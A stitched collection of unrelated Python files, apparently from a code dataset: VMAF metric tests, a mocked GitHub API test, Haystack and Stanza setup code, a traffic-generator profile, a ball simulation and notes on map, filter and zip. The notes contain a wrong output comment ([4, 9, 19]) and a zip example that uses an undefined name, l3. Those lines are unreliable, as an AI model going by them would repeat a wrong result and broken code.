dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.0},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_egl_1_score'], 0.983699512450884, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_egl_1_score'], 0.9974276726830457, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_egl_1_score'], 0.9984692380091739, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_egl_1_score'], 0.999146211879154, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_vif_fextractor_akiyo_multiply_enhn_gain_limit_1d1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerVifFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'vif_enhn_gain_limit': 1.1},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale0_egl_1.1_score'], 1.0298451531242514, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale1_egl_1.1_score'], 1.046596975760772, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale2_egl_1.1_score'], 1.0485607628500504, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_VIF_feature_vif_scale3_egl_1.1_score'], 1.0491232394147363, places=3)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9345057916666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['integer_adm_num_score']
def test_run_integer_adm_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9345057916666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale0_score'], 0.9078873333333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale1_score'], 0.8938705625000001, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale2_score'], 0.9300123749999999, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_scale3_score'], 0.9649663541666667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_score'], 371.8243668541666, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_score'], 397.8567857291667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale0_score'], 45.526718708333334, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale0_score'], 50.14397566666668, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale1_score'], 66.57503025, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale1_score'], 74.47584229166667, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale2_score'], 105.5588711875, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale2_score'], 113.50324393750002, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_num_scale3_score'], 154.1637464375, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm_den_scale3_score'], 159.733723875, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor_12bit(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_12bit_videos_for_testing()
self.fextractor = IntegerAdmFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 0.9517706666666667, places=4)
self.assertAlmostEqual(results[1]['integer_ADM_feature_adm2_score'], 1.000002, places=6)
def test_run_integer_adm_fextractor_akiyo_multiply(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_score'], 1.1167, places=5) # float 1.116686
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_integer_adm_fextractor_akiyo_multiply_enhn_gain_limit_1(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.0}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_egl_1_score'], 0.957433, places=6) # float 0.9574308606115118
def test_run_integer_adm_fextractor_akiyo_multiply_enhn_gain_limit_1d2(self):
ref_path = VmafConfig.test_resource_path("yuv", "refp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
dis_path = VmafConfig.test_resource_path("yuv", "disp_vmaf_hacking_investigation_0_0_akiyo_cif_notyuv_0to0_identity_vs_akiyo_cif_notyuv_0to0_multiply_q_352x288")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width': 352, 'height': 288})
self.fextractor = IntegerAdmFeatureExtractor(
[asset],
None, fifo_mode=False,
result_store=None,
optional_dict={'adm_enhn_gain_limit': 1.2}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['integer_ADM_feature_adm2_egl_1.2_score'], 1.116609, places=5) # float 1.116595
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_ciede2000_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = CIEDE2000FeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['CIEDE2000_feature_ciede2000_score'], 33.10755745833333, places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['CIEDE2000_feature_ciede2000_score'], np.float('inf'), places=4)
except AssertionError as e: self.verificationErrors.append(str(e))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
py | b414ba5869915604b65b899457bb0a18057457c5 | # Copyright Contributors to the Testing Farm project.
# SPDX-License-Identifier: Apache-2.0
import os
import pytest
import re
import gluetool
import gluetool_modules_framework.infrastructure.github
from . import create_module
ASSETS_DIR = os.path.join('gluetool_modules_framework', 'tests', 'assets', 'github')
# NOTE(ivasilev) commits and commit_statuses are heavily mocked just to make depends-on tests pass
GET_COMMIT = {
"commit": {
"url": "https://api.github.com/repos/octocat/Hello-World/git/commits/6dcb09b5b57875f334f61aebed695e2e4193db5e",
"author": {
"name": "Monalisa Octocat",
"email": "[email protected]",
"date": "2011-04-14T16:00:49Z"},
"message": "Some commit message"
},
"state": "mocked-to-make-tests-pass",
"statuses": []
}
def _load_assets(name):
return gluetool.utils.load_json(os.path.join(ASSETS_DIR, '{}.json'.format(name)))
@pytest.fixture
def module():
github_module = create_module(gluetool_modules_framework.infrastructure.github.GitHub)[1]
github_module._config['pull-request'] = 'oamg:leapp-repository:620:7fb300d703abbd07e8834d121bd2ac3088535c8b'
return github_module
def test_depends_on(module, monkeypatch):
# Borrowed from copr test
class dummy_request(object):
def __init__(self, source):
self.source = source
self.content = str(self.source)
self.status_code = 200
self.links = {}
def json(self):
return self.source
def mocked_get(url, params=None):
if re.match(r'.*/pulls/\d+$', url):
return dummy_request(_load_assets("fetch_pull_request"))
elif re.match(r'.*/repos/oamg/leapp-repository/commits/.*', url):
return dummy_request(GET_COMMIT)
elif re.match(r'.*/repos/oamg/leapp-repository/pulls/\d+/commits', url):
return dummy_request(_load_assets("list_pr_commits"))
monkeypatch.setattr(gluetool_modules_framework.infrastructure.github.requests, 'get', mocked_get)
monkeypatch.setattr(gluetool_modules_framework.infrastructure.github, 'is_json_response', lambda _: True)
monkeypatch.setattr(
gluetool_modules_framework.infrastructure.github.GitHubAPI, 'is_collaborator', lambda a, b, c, d: False
)
assert module.eval_context == {}
module.execute()
eval_context = module.eval_context
primary_task = module.primary_task()
assert eval_context['PRIMARY_TASK'] == primary_task
assert primary_task.depends_on == ['leapp-repository/PR42', 'anotherproject/PR4242', 'leapp/PR669']
# TODO technical debt - cover other test cases.
|
py | b414ba7b6cafacc828661711c7d29722bacb4f2e | import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from haystack.constants import DEFAULT_ALIAS
from haystack import signals
from haystack.utils import loading
__author__ = 'Daniel Lindsley'
__version__ = (2, 0, 0, 'beta')
# Setup default logging.
log = logging.getLogger('haystack')
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
log.addHandler(stream)
# Help people clean up from 1.X.
if hasattr(settings, 'HAYSTACK_SITECONF'):
raise ImproperlyConfigured('The HAYSTACK_SITECONF setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_SEARCH_ENGINE'):
raise ImproperlyConfigured('The HAYSTACK_SEARCH_ENGINE setting has been replaced with HAYSTACK_CONNECTIONS.')
if hasattr(settings, 'HAYSTACK_ENABLE_REGISTRATIONS'):
raise ImproperlyConfigured('The HAYSTACK_ENABLE_REGISTRATIONS setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_INCLUDE_SPELLING'):
raise ImproperlyConfigured('The HAYSTACK_INCLUDE_SPELLING setting is now a per-backend setting & belongs in HAYSTACK_CONNECTIONS.')
# Check the 2.X+ bits.
if not hasattr(settings, 'HAYSTACK_CONNECTIONS'):
raise ImproperlyConfigured('The HAYSTACK_CONNECTIONS setting is required.')
if DEFAULT_ALIAS not in settings.HAYSTACK_CONNECTIONS:
raise ImproperlyConfigured("The default alias '%s' must be included in the HAYSTACK_CONNECTIONS setting." % DEFAULT_ALIAS)
# Load the connections.
connections = loading.ConnectionHandler(settings.HAYSTACK_CONNECTIONS)
# Load the router(s).
connection_router = loading.ConnectionRouter()
if hasattr(settings, 'HAYSTACK_ROUTERS'):
if not isinstance(settings.HAYSTACK_ROUTERS, (list, tuple)):
raise ImproperlyConfigured("The HAYSTACK_ROUTERS setting must be either a list or tuple.")
connection_router = loading.ConnectionRouter(settings.HAYSTACK_ROUTERS)
# Setup the signal processor.
signal_processor_path = getattr(settings, 'HAYSTACK_SIGNAL_PROCESSOR', 'haystack.signals.BaseSignalProcessor')
signal_processor_class = loading.import_class(signal_processor_path)
signal_processor = signal_processor_class(connections, connection_router)
# Per-request, reset the ghetto query log.
# Probably not extraordinarily thread-safe but should only matter when
# DEBUG = True.
def reset_search_queries(**kwargs):
for conn in connections.all():
conn.reset_queries()
if settings.DEBUG:
from django.core import signals as django_signals
django_signals.request_started.connect(reset_search_queries)
|
py | b414bb6db1effc3a0e77033625fbdb7483a39ab1 | import logging
import sys
from logging.handlers import TimedRotatingFileHandler
class InfoFilter(logging.Filter):
def filter(self, rec):
return rec.levelno in (logging.DEBUG, logging.INFO)
class ErrorFilter(logging.Filter):
def filter(self, rec):
return rec.levelno in (logging.WARNING, logging.ERROR, logging.CRITICAL)
def create_logger(logging_path, logger_name):
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
h1 = logging.StreamHandler(sys.stdout)
h1.setLevel(logging.DEBUG)
h1.addFilter(InfoFilter())
h1.setFormatter(formatter)
logger.addHandler(h1)
h2 = logging.StreamHandler(sys.stderr)
h2.setLevel(logging.WARNING)
h2.addFilter(ErrorFilter())
h2.setFormatter(formatter)
logger.addHandler(h2)
h3 = TimedRotatingFileHandler(logging_path, when="midnight", interval=1)
h3.setLevel(logging.DEBUG)
h3.setFormatter(formatter)
logger.addHandler(h3)
return logger
|
py | b414bd0948f5c8573e1a39ddcba482c382a4de92 | import os, time, datetime, threading, random, sys
import numpy as np
from cortix.src.module import Module
from cortix.src.port import Port
from cortix.src.cortix_main import Cortix
from plot_multi import Plot
from bouncingball import BouncingBall
import shapely.geometry as geo
class BallHandler(Module):
def __init__(self,shape=None, balls= 5, runtime=3):
super().__init__()
self.shape = shape
self.balls = balls
self.runtime = runtime
self.local_balls = []
self.local_messengers = []
self.timestamp=str(datetime.datetime.now())
for i in range(self.balls):
ball = BouncingBall(self.shape)
ball.r = 0.1
self.local_balls.append(ball)
self.local_messengers.append(ball.messenger)
def run(self):
t = 0.01
self.elapsed, oe = 0,0
its = round(self.runtime/t)
ball_list = []
for messenger in self.local_messengers:
ball_list.append(messenger)
for i in self.ports: #Send initial properties
if 'plot' not in str(i):
self.send(self.local_messengers,i)
for i in self.ports:
if 'plot' not in str(i):
ex_balls = self.recv(i)
for ball in ex_balls:
ball_list.append(ball)
for i in range(its):
self.elapsed += t
if oe != round(self.elapsed,1):
print('Time Elapsed: ', round(self.elapsed,1))
oe = round(self.elapsed,1)
for ball in self.local_balls:
ball.run(ball_list)
for i in self.ports: #Send and receive messages for each timestep
self.send(self.local_messengers,i)
ball_list = [f for f in self.local_messengers]
for i in self.ports:
if 'plot' in str(i): #Not receiving messages from plotting
continue
messengerlis = self.recv(i)
for messenger in messengerlis:
ball_list.append(messenger)
for ball in self.local_balls:
ball.messenger.collision = []
for i in self.ports: #Send 'done' string to plot module as end condition
if 'plot' in str(i):
self.send('done',i)
print('Time Elapsed: ', self.elapsed)
print('Done')
if __name__ == '__main__':
cortix = Cortix(use_mpi=False)
mod_list = []
shape = geo.box(-30,0,30,50)
plot = Plot(shape=shape, modules=10)
plot.fps = 10
cortix.add_module(plot)
for i in range(10):
time.sleep(0.01)
app = BallHandler(shape, balls=10,runtime = 1)
mod_list.append(app)
cortix.add_module(app)
for c,i in enumerate(mod_list):
i.connect('plot-send{}'.format(c),plot.get_port('plot-receive{}'.format(c)))
for j in mod_list:
if i == j:
continue
name = '{}{}'.format(i.timestamp,j.timestamp)
name2 = '{}{}'.format(j.timestamp,i.timestamp)
j.connect(name, i.get_port(name2))
cortix.draw_network('network_graph.png')
cortix.run()
print('bye')
|
py | b414bd1c7a984bce5e4b36333da6399dd1887433 | # Copyright (c) 2020 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stream profile for T-rex traffic generator.
Stream profile:
- Two streams sent in directions 0 --> 1 and 1 --> 0 at the same time.
- Packet: ETH / DOT1Q / IP /
- Direction 0 --> 1:
- VLAN range: 1 - 100
- Source IP address range: 10.0.0.1 - 10.0.0.254
- Destination IP address range: 20.0.0.1 - 20.0.0.254
- Direction 1 --> 0:
- VLAN range: 1 - 100
- Source IP address range: 20.0.0.1 - 20.0.0.254
- Destination IP address range: 10.0.0.1 - 10.0.0.254
"""
from trex.stl.api import *
from profile_trex_stateless_base_class import TrafficStreamsBaseClass
class TrafficStreams(TrafficStreamsBaseClass):
"""Stream profile."""
def __init__(self):
"""Initialization and setting of streams' parameters."""
super(TrafficStreamsBaseClass, self).__init__()
# VLAN IDs
self.vlans = 100
self.p1_vlan_start = 1
self.p1_vlan_end = self.p1_vlan_start + self.vlans - 1
self.p2_vlan_start = 1
self.p2_vlan_end = self.p2_vlan_start + self.vlans - 1
# IPs used in packet headers.
self.p1_src_start_ip = u"10.0.0.1"
self.p1_src_end_ip = u"10.0.0.254"
self.p1_dst_start_ip = u"20.0.0.1"
self.p1_dst_end_ip = u"20.0.0.254"
self.p2_src_start_ip = u"20.0.0.1"
self.p2_src_end_ip = u"20.0.0.254"
self.p2_dst_start_ip = u"10.0.0.1"
self.p2_dst_end_ip = u"10.0.0.254"
def define_packets(self):
"""Defines the packets to be sent from the traffic generator.
Packet definition: | ETH | DOT1Q | IP |
:returns: Packets to be sent from the traffic generator.
:rtype: tuple
"""
# Direction 0 --> 1
base_pkt_a = (
Ether() /
Dot1Q(
vlan=self.p1_vlan_start
) /
IP(
src=self.p1_src_start_ip,
dst=self.p1_dst_start_ip,
proto=61
)
)
# Direction 1 --> 0
base_pkt_b = (
Ether() /
Dot1Q(
vlan=self.p2_vlan_start
) /
IP(
src=self.p2_src_start_ip,
dst=self.p2_dst_start_ip,
proto=61
)
)
# Direction 0 --> 1
vm1 = STLScVmRaw(
[
STLVmFlowVar(
name=u"vlan",
min_value=self.p1_vlan_start,
max_value=self.p1_vlan_end,
size=2,
op=u"inc"
),
STLVmWrFlowVar(
fv_name=u"vlan",
pkt_offset=u"Dot1Q.vlan"
),
STLVmFlowVar(
name=u"ip_src",
min_value=self.p1_src_start_ip,
max_value=self.p1_src_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_src",
pkt_offset=u"IP.src"
),
STLVmFlowVar(
name=u"ip_dst",
min_value=self.p1_dst_start_ip,
max_value=self.p1_dst_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_dst",
pkt_offset=u"IP.dst"
),
STLVmFixIpv4(
offset=u"IP"
)
]
)
# Direction 1 --> 0
vm2 = STLScVmRaw(
[
STLVmFlowVar(
name=u"vlan",
min_value=self.p2_vlan_start,
max_value=self.p2_vlan_end,
size=2,
op=u"inc"
),
STLVmWrFlowVar(
fv_name=u"vlan",
pkt_offset=u"Dot1Q.vlan"
),
STLVmFlowVar(
name=u"ip_src",
min_value=self.p2_src_start_ip,
max_value=self.p2_src_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_src",
pkt_offset=u"IP.src"
),
STLVmFlowVar(
name=u"ip_dst",
min_value=self.p2_dst_start_ip,
max_value=self.p2_dst_end_ip,
size=4,
op=u"random"
),
STLVmWrFlowVar(
fv_name=u"ip_dst",
pkt_offset=u"IP.dst"
),
STLVmFixIpv4(
offset=u"IP"
)
]
)
return base_pkt_a, base_pkt_b, vm1, vm2
def register():
"""Register this traffic profile to T-rex.
Do not change this function.
:returns: Traffic streams.
:rtype: Object
"""
return TrafficStreams()
|
py | b414bd34c155ba5b75b6e6a5a423e28ea6dff3b2 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_oam_getoamjob_input import TapiOamGetoamjobInput # noqa: F401,E501
from tapi_server import util
class InlineObject21(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, input=None): # noqa: E501
"""InlineObject21 - a model defined in OpenAPI
:param input: The input of this InlineObject21. # noqa: E501
:type input: TapiOamGetoamjobInput
"""
self.openapi_types = {
'input': TapiOamGetoamjobInput
}
self.attribute_map = {
'input': 'input'
}
self._input = input
@classmethod
def from_dict(cls, dikt) -> 'InlineObject21':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The inline_object_21 of this InlineObject21. # noqa: E501
:rtype: InlineObject21
"""
return util.deserialize_model(dikt, cls)
@property
def input(self):
"""Gets the input of this InlineObject21.
:return: The input of this InlineObject21.
:rtype: TapiOamGetoamjobInput
"""
return self._input
@input.setter
def input(self, input):
"""Sets the input of this InlineObject21.
:param input: The input of this InlineObject21.
:type input: TapiOamGetoamjobInput
"""
self._input = input
|
py | b414bf56a828a3d5fbadbb183ee94b7eadb7d38e | import argparse
import logging
import os
import pathlib
import re
import subprocess
import sys
import tempfile
from enum import Enum
from stanza.models.common.constant import treebank_to_short_name
from stanza.utils.datasets import common
import stanza.utils.default_paths as default_paths
from stanza.utils import conll18_ud_eval as ud_eval
logger = logging.getLogger('stanza')
class Mode(Enum):
TRAIN = 1
SCORE_DEV = 2
SCORE_TEST = 3
def build_argparse():
parser = argparse.ArgumentParser()
parser.add_argument('--save_output', dest='temp_output', default=True, action='store_false', help="Save output - default is to use a temp directory.")
parser.add_argument('treebanks', type=str, nargs='+', help='Which treebanks to run on. Use all_ud or ud_all for all UD treebanks')
parser.add_argument('--train', dest='mode', default=Mode.TRAIN, action='store_const', const=Mode.TRAIN, help='Run in train mode')
parser.add_argument('--score_dev', dest='mode', action='store_const', const=Mode.SCORE_DEV, help='Score the dev set')
parser.add_argument('--score_test', dest='mode', action='store_const', const=Mode.SCORE_TEST, help='Score the test set')
# This argument needs to be here so we can identify if the model already exists in the user-specified home
parser.add_argument('--save_dir', type=str, default=None, help="Root dir for saving models. If set, will override the model's default.")
parser.add_argument('--force', dest='force', action='store_true', default=False, help='Retrain existing models')
return parser
SHORTNAME_RE = re.compile("[a-z-]+_[a-z0-9]+")
def main(run_treebank, model_dir, model_name, add_specific_args=None):
logger.info("Training program called with:\n" + " ".join(sys.argv))
paths = default_paths.get_default_paths()
parser = build_argparse()
if add_specific_args is not None:
add_specific_args(parser)
if '--extra_args' in sys.argv:
idx = sys.argv.index('--extra_args')
extra_args = sys.argv[idx+1:]
command_args = parser.parse_args(sys.argv[1:idx])
else:
command_args, extra_args = parser.parse_known_args()
# Pass this through to the underlying model as well as use it here
if command_args.save_dir:
extra_args.extend(["--save_dir", command_args.save_dir])
mode = command_args.mode
treebanks = []
for treebank in command_args.treebanks:
# this is a really annoying typo to make if you copy/paste a
# UD directory name on the cluster and your job dies 30s after
# being queued for an hour
if treebank.endswith("/"):
treebank = treebank[:-1]
if treebank.lower() in ('ud_all', 'all_ud'):
ud_treebanks = common.get_ud_treebanks(paths["UDBASE"])
treebanks.extend(ud_treebanks)
else:
treebanks.append(treebank)
for treebank_idx, treebank in enumerate(treebanks):
if treebank_idx > 0:
logger.info("=========================================")
if SHORTNAME_RE.match(treebank):
short_name = treebank
else:
short_name = treebank_to_short_name(treebank)
logger.debug("%s: %s" % (treebank, short_name))
if mode == Mode.TRAIN and not command_args.force and model_name != 'ete':
if command_args.save_dir:
model_path = "%s/%s_%s.pt" % (command_args.save_dir, short_name, model_name)
else:
model_path = "saved_models/%s/%s_%s.pt" % (model_dir, short_name, model_name)
if os.path.exists(model_path):
logger.info("%s: %s exists, skipping!" % (treebank, model_path))
continue
else:
logger.info("%s: %s does not exist, training new model" % (treebank, model_path))
if command_args.temp_output and model_name != 'ete':
with tempfile.NamedTemporaryFile() as temp_output_file:
run_treebank(mode, paths, treebank, short_name,
temp_output_file.name, command_args, extra_args)
else:
run_treebank(mode, paths, treebank, short_name,
None, command_args, extra_args)
def run_eval_script(gold_conllu_file, system_conllu_file, evals=None):
""" Wrapper for lemma scorer. """
gold_ud = ud_eval.load_conllu_file(gold_conllu_file)
system_ud = ud_eval.load_conllu_file(system_conllu_file)
evaluation = ud_eval.evaluate(gold_ud, system_ud)
if evals is None:
return ud_eval.build_evaluation_table(evaluation, verbose=True, counts=False)
else:
results = [evaluation[key].f1 for key in evals]
return " ".join("{:.2f}".format(100 * x) for x in results)
def run_eval_script_tokens(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["Tokens", "Sentences", "Words"])
def run_eval_script_mwt(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["Words"])
def run_eval_script_pos(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["UPOS", "XPOS", "UFeats", "AllTags"])
def run_eval_script_depparse(eval_gold, eval_pred):
return run_eval_script(eval_gold, eval_pred, evals=["UAS", "LAS", "CLAS", "MLAS", "BLEX"])
|
py | b414bfb4b3f9d70a8573a87ced57cdbb73d77eec | """Map Filter Zip List Comprehensions
Higher order functions
A function that takes a function as a parameter and/or returns a function as it's return value
Example: sorted
map _
|
-- modern alternative -> list comprehensions and generator expressions
|
filter -
The map function
map(func, *iterables)
*iterables -> avariable number of iterable objects
func -> some function that takes a many arguments as there are iterable objects passed to iterables
map(func, *iterables) will then return an iterator that calculates the function applied to each element of the iterables
The iterator stops as soon as one of the iterables has been exhausted, so, unequal length iterables can be used
Examples
"""
from unittest import result
l = [2, 3, 4]
def sq(x):
return x**2
list(map(sq, l)) # [4, 9, 19]
l1 = [1, 2, 3]
l2 = [10, 20, 30]
def add(x, y):
return x + y
list(map(add, l1, l2)) # [11, 22, 33]
"""The filter function
filter(func, iterable)
iterable -> a single iterable
func -> some function that takes a single argument
filter(func, iterable) will then return an iterator that contains all the elements of the iterable for which the function called on it is Truthy
If the function is None, it simply returns the elements of iterable that are Truthy
Examples
"""
l = [0, 1, 2, 3, 4] # 0 is Falsey, all the other numbers are Truthy
list(filter(None, l)) # [1, 2, 3, 4]
def is_even(n):
return n % 2 == 0
list(filter(is_even, l)) # [0, 2, 4]
list(filter(lambda n: n % 2 == 0, l)) # [0, 2, 4]
"""The zip function zip(*iterables) # this is not a high order function that takes multiple iterables and return one interable
[1, 2, 3, 4] zip
#--------> (1, 10), (2, 20), (3, 30), (4, 40)
(10, 20, 30, 40)
[1, 2, 3] zip
[10, 20, 30] #--------> (1, 10, 'a'), (2, 20, 'b'), (3, 30. 'c')
['a', 'b', 'c']
[1, 2, 3, 4, 5] zip
#--------> (1, 10), (2, 20), (3, 30)
[10, 20, 30]
Examples
"""
l1 = [1, 2, 3]
l2 = [10, 20, 30, 40]
ls = 'python'
list(zip(l1, l2, l3)) # [(1, 10, 'p'), (2, 20, 'y') (3, 30, 't')]
